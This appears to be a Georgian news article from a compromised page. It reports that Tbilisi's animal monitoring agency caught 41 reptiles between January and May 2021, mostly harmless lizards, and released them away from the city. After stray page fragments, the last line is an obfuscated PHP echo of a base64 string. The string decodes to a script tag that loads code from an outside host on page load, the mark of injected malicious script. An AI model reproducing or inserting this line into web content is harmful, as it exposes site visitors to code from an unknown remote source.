celsiusi
ავერსი შნაიდერი
დედაქალაქის მერიის ცხოველთა მონიტორინგის სააგენტოს ინფორმაციით, დედაქალაქში 2021 წლის იანვრიდან დღემდე სულ 41 ვეწარმავალია დაჭერილი. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს  მერიის ცხოველთა მონიტორინგის სააგენტოში განუცხადეს. 
 
“თვეების მიხედვით სტატისტიკა შემდეგია: იანვარი - 0, თებერვალი - 0, მარტი - 2, აპრილი - 8 და მაისი - 31.  მაისში მოიმატა შემთხვევებმა, მაგრამ შარშანდელთან შედარებით ნაკლებია. ტემპერატურის მატებასთან ერთად, ქვეწარმავლების გამოჩენა ბუნებრივია და პანიკის საფუძველი არ არსებობს, ვინაიდან უმეტესად ეს არის ხვლიკის ჯიშის - “გველხოკერა”  და საფრთხეს არ წარმოადგენს, თუმცა ეს იმას არ ნიშნავს, რომ ნახვის შემთხვევაში არ მივმართოთ შესაბამის სამსახურს”, - განაცხადეს სააგენტოში. 
 
მათივე განმარტებით, დაჭერილი ქვეწარმავლები ქალაქიდან მოშორებით, ბუნებრივ წიაღში ბრუნდებიან, სადაც მათი არსებობისთვის შესაბამისი გარემოა. 
 
“პრევენციის მიზნით, ტემპერატურის მატებასთან ერთად ხდება შეწამვლა, ისეთი მიდამოების სადაც შესაძლოა იყოს მოსალოდნელი ქვეწარმავლის არსებობა”, - განმარტეს ცხოველთა მონიტორინგის სააგენტოში.
 
 
 
1564
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");